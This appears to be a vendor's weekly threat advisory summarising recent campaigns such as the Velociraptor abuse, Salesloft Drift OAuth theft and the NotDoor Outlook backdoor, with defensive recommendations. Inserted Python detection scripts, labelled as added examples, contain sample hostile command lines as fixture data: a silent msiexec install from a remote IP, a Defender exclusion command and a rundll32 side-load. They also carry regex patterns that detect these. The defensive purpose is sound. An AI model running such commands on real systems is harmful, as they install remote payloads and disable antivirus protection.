Legitimate Tools Weaponized for Stealthy Access and Data Theft
- SISA Weekly Threat Watch -

SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations that help security teams take appropriate action to defend against the latest critical threats.
1. Abuse of Legitimate Tools and Cloud Services
Attackers are strategically co-opting trusted software and infrastructure to hide in plain sight, making detection and attribution significantly more difficult.
- Weaponized Forensic Tools: Threat actors are exploiting the open-source forensic tool Velociraptor to gain initial access and establish persistent command-and-control (C2) tunnels, leveraging msiexec for deployment and even using Visual Studio Code’s tunnel feature for stealthy egress.
- AI-Powered Exploitation: The offensive security tool HexStrike AI is being discussed and potentially misused on dark web forums to accelerate the weaponization and automated exploitation of critical vulnerabilities, such as those in Citrix NetScaler, dramatically shrinking the patch window for defenders.
- Cloud Service Exploitation: Campaigns are heavily abusing infrastructure from Cloudflare Workers, Microsoft Dev Tunnels, and AWS EC2 to host payloads, mask C2 traffic, and create resilient, difficult-to-track attack infrastructure.
2. Sophisticated Identity and Application Abuse
A continued focus on compromising identity and SaaS platforms demonstrates how attackers pivot to the most critical elements of the modern enterprise: its cloud identity layer and business applications.
- OAuth Token Compromise: The campaign by UNC6395 exploiting compromised Salesloft Drift OAuth tokens widened, leading to massive data exfiltration from Salesforce orgs and even unauthorized access to linked Google Workspace accounts, highlighting the severe supply chain risks of third-party integrations.
- Outlook Backdoor (NotDoor): APT28 deployed a novel VBA macro backdoor within Microsoft Outlook itself. It monitors incoming emails for trigger phrases to execute commands and exfiltrate data, using Outlook as a stealthy C2 channel and leveraging DLL side-loading via onedrive.exe for persistence.
- Device Code Flow Exploitation: Midnight Blizzard (APT29) ran a sophisticated watering hole campaign that selectively redirected victims to lookalike Cloudflare pages, tricking them into approving a malicious Microsoft Device Code authentication request, granting attackers access to their M365 tenant.
3. Evolution of Malware-as-a-Service (MaaS) and Cross-Platform Threats
Cybercriminal ecosystems are maturing, offering more sophisticated tools and expanding their reach to new platforms, including mobile and Linux.
- CastleRAT MaaS Ecosystem: The actor TAG-150 is advancing a full MaaS operation with CastleLoader and the new CastleRAT (in Python and C variants). The campaign uses “ClickFix” phishing and fake GitHub repos for delivery and employs advanced anti-analysis techniques like UAC prompt bombing to force Windows Defender exclusions.
- Lazarus Group Targets DeFi: The state-sponsored Lazarus Group conducted a complex campaign against the DeFi sector, deploying a multi-stage payload including PondRAT, ThemeForestRAT (a fileless, in-memory RAT), and the advanced RemotePE backdoor, using social engineering on Telegram and fake scheduling sites as the initial lure.
- Android NFC Banking Malware (PhantomCard): A new Android Trojan emerged in Brazil, masquerading as a card protection app (“Proteção Cartões”). It abuses NFC capabilities to read payment card data and PINs in real time, enabling large-scale contactless payment fraud directly from a victim’s phone.
4. Geopolitical Espionage and Targeted Data Theft
State-aligned actors continue to refine their techniques for long-term espionage, targeting government and critical infrastructure sectors with remarkable persistence.
- ShadowSilk Campaign: This group, with links to YoroTrooper and SturgeonPhisher, targeted government agencies across Central Asia and APAC. They used spear-phishing, exploits against Drupal and WordPress, and hid their C2 communications within Telegram bot traffic to stealthily exfiltrate data.
- ShinyHunters Analysis: A detailed profile of the ShinyHunters cybercrime collective revealed their evolution into a sophisticated extortion enterprise. Their tactics now include collaboration with groups like Scattered Spider, the use of vishing to compromise IT staff, the development of custom malware and zero-day exploits, and an expansion into Ransomware-as-a-Service (RaaS) operations.
Proactive Steps for the Week
Lock Down Identity and SaaS Access:
- Audit OAuth Apps: Immediately review and audit all connected OAuth applications in M365, Salesforce, and Google Workspace. Revoke any that are unused or suspicious.
- Harden MFA: Enforce phishing-resistant MFA (number matching, FIDO2 keys) and implement Conditional Access Policies to restrict device code flow and block unrecognized devices.
- Monitor Identity Logs: Scrutinize Entra ID/M365 logs for unusual device registrations, consent grants, and bulk file operations.
Defend Against Living-off-the-Land (LotL) Tactics:
- Application Control: Implement application allow-listing to control the execution of powerful tools like msiexec, powershell, and vscode.
- Enhanced Logging: Ensure command-line auditing and PowerShell transcription are enabled and ingested into a SIEM for analysis.
- Monitor for Anomalies: Create alerts for Windows Defender exclusion changes, unusual instances of onedrive.exe spawning child processes, and network connections to developer/cloud services from non-developer endpoints.
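The anomaly alerts listed above can be prototyped as simple rules over endpoint telemetry. The following is an added example, not part of the SISA advisory and not vendor code: it runs four detections (Windows Defender exclusion changes via Event ID 5007 or an `Add-MpPreference -Exclusion*` command line, `onedrive.exe` spawning an unexpected child, `msiexec` installing from a remote URL, and connections to developer tunnelling services from non-developer hosts) over constructed Sysmon-style events. The developer host list, the benign-child allowlist and the tunnel domain suffixes are assumptions that must be tuned to your estate.

```python
"""Toy detections for the living-off-the-land behaviours named in the advisory.
Added example: the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Assumption: hosts assigned to developers (in production, pull from the asset inventory).
DEVELOPER_HOSTS = {"DEV-WS-02"}
# Assumption: domain suffixes of Microsoft Dev Tunnels, Cloudflare Workers and VS Code tunnels.
TUNNEL_SUFFIXES = (".devtunnels.ms", ".workers.dev", ".tunnels.api.visualstudio.com")
# Assumption: children OneDrive legitimately spawns; anything else is worth a look.
ONEDRIVE_BENIGN_CHILDREN = {"onedrive.exe", "onedrivestandaloneupdater.exe", "onedrivesetup.exe"}

DEFENDER_EXCLUSION_RE = re.compile(r"Windows Defender\\Exclusions\\(Paths|Processes|Extensions)", re.I)
MPPREF_EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)
MSIEXEC_REMOTE_RE = re.compile(r"msiexec(\.exe)?\s.*\bhttps?://", re.I)

# Constructed events in a flattened Sysmon/Defender shape (EventID 1 = process create,
# 3 = network connection, 5007 = Defender configuration change). Paths and IPs are invented.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "Host": "FIN-LAPTOP-07", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i http://203.0.113.45/agent.msi /qn"},
    {"EventID": 1, "Host": "FIN-LAPTOP-07", "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "CommandLine": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\side.dll,Start"},
    {"EventID": 1, "Host": "DEV-WS-02", "Image": r"C:\Users\dev\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "CommandLine": "OneDriveStandaloneUpdater.exe"},
    {"EventID": 1, "Host": "FIN-LAPTOP-07", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell.exe -nop -c "Add-MpPreference -ExclusionPath C:\Users\Public"'},
    {"EventID": 5007, "Host": "FIN-LAPTOP-07",
     "Message": r"Windows Defender Antivirus Configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public = 0x0"},
    {"EventID": 5007, "Host": "DEV-WS-02",
     "Message": r"Windows Defender Antivirus Configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Scan\ScheduleDay = 0x0"},
    {"EventID": 3, "Host": "FIN-LAPTOP-07", "DestinationHostname": "abc123-8080.euw.devtunnels.ms"},
    {"EventID": 3, "Host": "DEV-WS-02", "DestinationHostname": "abc123-8080.euw.devtunnels.ms"},
]


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[Dict]) -> List[Alert]:
    """Apply the four rules and return one Alert per match, in event order."""
    alerts: List[Alert] = []
    for ev in events:
        eid, host = ev.get("EventID"), ev.get("Host", "?")
        cmd = ev.get("CommandLine", "")
        if eid == 1:
            parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
            if parent == "onedrive.exe" and child not in ONEDRIVE_BENIGN_CHILDREN:
                alerts.append(Alert("onedrive_child_process", host, cmd))
            if MSIEXEC_REMOTE_RE.search(cmd):
                alerts.append(Alert("msiexec_remote_install", host, cmd))
            if MPPREF_EXCLUSION_RE.search(cmd):
                alerts.append(Alert("defender_exclusion_cmdline", host, cmd))
        elif eid == 5007 and DEFENDER_EXCLUSION_RE.search(ev.get("Message", "")):
            alerts.append(Alert("defender_exclusion_changed", host, ev["Message"]))
        elif eid == 3:
            dest = ev.get("DestinationHostname", "").lower()
            if dest.endswith(TUNNEL_SUFFIXES) and host not in DEVELOPER_HOSTS:
                alerts.append(Alert("tunnel_service_from_non_dev_host", host, dest))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

The same `DEV-WS-02` tunnel connection that is allowed here would be an alert on `FIN-LAPTOP-07`; the value of the rule comes from the host-to-role mapping, so keep that mapping current rather than widening the allowlist when developers complain.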
Patch and Isolate Critical Systems:
- Priority Patching: Urgently patch publicly disclosed vulnerabilities, especially in internet-facing systems like Citrix NetScaler.
- Segment Networks: Ensure critical infrastructure, including vulnerability management and SaaS administration consoles, is not directly exposed to the internet and is placed in a segmented network zone.
Enhance Supply Chain and Third-Party Risk Management:
- Review Integrations: Conduct a thorough review of all third-party integrations with critical SaaS platforms (Salesforce, M365, Google). Understand the data permissions granted.
- Enforce Least Privilege: Apply the principle of least privilege to every connected app and integration. Regularly review and trim unnecessary permissions.
Conduct Targeted User Training:
- Vishing Awareness: Train IT helpdesk and finance employees on vishing risks and implement strict out-of-band verification procedures for any privileged access requests.
- Tool Misuse: Educate users, especially developers, on the dangers of downloading tools from unverified sources on GitHub and following instructions from unsolicited “update” prompts.
Expand Threat Detection Capabilities:
- Leverage IOCs: Integrate the provided Indicators of Compromise (IOCs) into security tools to block known malicious domains and IPs.
- Behavioral Detection: Develop detections for the specific TTPs outlined, such as Telegram C2 traffic from corporate assets, SOQL queries from unexpected IPs, and NFC-reading apps on managed mobile devices.
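Two of the behavioral detections listed above, SOQL queries from unexpected IPs and Telegram C2 traffic from corporate assets, can be expressed as small rules over exported logs. This is an added example, not part of the advisory and not Salesforce or Telegram code: the CSV is constructed and only loosely modelled on a Salesforce API event log, the proxy lines are constructed, and the trusted egress ranges, row threshold and list of hosts permitted to reach Telegram are assumptions to be replaced with your own values.

```python
"""Toy SaaS and egress detections for the TTPs named in the advisory.
Added example: all log data below is constructed."""
import csv
import io
import ipaddress
from dataclasses import dataclass
from typing import List
from urllib.parse import urlsplit

# Assumption: corporate egress ranges from which Salesforce API use is expected
# (RFC 5737 documentation addresses, not real infrastructure).
TRUSTED_EGRESS = [ipaddress.ip_network("198.51.100.0/24")]
BULK_ROWS_THRESHOLD = 10_000           # assumption: tune to normal integration volumes
SOQL_METHODS = {"query", "queryall", "querymore"}
# Assumption: endpoints where Telegram use is sanctioned (normally from the CMDB).
TELEGRAM_PERMITTED_HOSTS = {"COMMS-WS-03"}

# Constructed records loosely modelled on a Salesforce API event log export.
SALESFORCE_API_LOG = """\
TIMESTAMP,USER_ID,CLIENT_IP,METHOD,ENTITY_NAME,ROWS_PROCESSED,QUERY
20250903120000.000,user-A,198.51.100.23,query,Account,250,"SELECT Id, Name FROM Account"
20250903120501.000,user-A,203.0.113.77,query,Case,250,"SELECT Id, Subject FROM Case"
20250903120702.000,user-B,203.0.113.77,queryAll,Contact,120000,"SELECT Id, Email, Phone FROM Contact"
20250903121000.000,user-C,198.51.100.41,describe,Opportunity,0,
"""

# Constructed web-proxy lines: timestamp host src_ip method target status.
PROXY_LOG = """\
2025-09-03T12:06:10Z FIN-LAPTOP-07 10.20.30.41 CONNECT api.telegram.org:443 200
2025-09-03T12:06:12Z FIN-LAPTOP-07 10.20.30.41 GET https://api.telegram.org/bot<token-redacted>/getUpdates 200
2025-09-03T12:06:30Z COMMS-WS-03 10.20.31.9 CONNECT api.telegram.org:443 200
2025-09-03T12:07:00Z MKT-WS-11 10.20.31.12 CONNECT www.salesforce.com:443 200
"""


@dataclass(frozen=True)
class Alert:
    rule: str
    subject: str   # user id or hostname
    detail: str


def detect_salesforce(csv_text: str) -> List[Alert]:
    """Flag SOQL executed from outside TRUSTED_EGRESS; escalate bulk row counts."""
    alerts: List[Alert] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["METHOD"].lower() not in SOQL_METHODS:
            continue
        ip = ipaddress.ip_address(row["CLIENT_IP"])
        if any(ip in net for net in TRUSTED_EGRESS):
            continue
        rows = int(row["ROWS_PROCESSED"] or 0)
        rule = "soql_bulk_from_untrusted_ip" if rows >= BULK_ROWS_THRESHOLD else "soql_from_untrusted_ip"
        alerts.append(Alert(rule, row["USER_ID"],
                            f"{row['CLIENT_IP']} {row['METHOD']} {row['ENTITY_NAME']} rows={rows}"))
    return alerts


def _request_host(method: str, target: str) -> str:
    """Destination host of a proxy request (CONNECT carries host:port, others a URL)."""
    if method.upper() == "CONNECT":
        return target.rsplit(":", 1)[0].lower()
    return (urlsplit(target).hostname or "").lower()


def detect_telegram_egress(log_text: str) -> List[Alert]:
    """Flag Telegram API traffic from hosts that have no business reason to use it."""
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, _src_ip, method, target, _status = line.split()
        dest = _request_host(method, target)
        if (dest == "telegram.org" or dest.endswith(".telegram.org")) and host not in TELEGRAM_PERMITTED_HOSTS:
            alerts.append(Alert("telegram_api_from_corporate_asset", host, f"{ts} {method} {dest}"))
    return alerts


if __name__ == "__main__":
    for a in detect_salesforce(SALESFORCE_API_LOG) + detect_telegram_egress(PROXY_LOG):
        print(f"[{a.rule}] {a.subject}: {a.detail}")
```

The Salesforce rule deliberately keys on the client IP rather than the connected app, because a stolen OAuth token is presented by a legitimate app identity; the IP and row volume are what change when the token leaves the integration vendor's hands.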
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.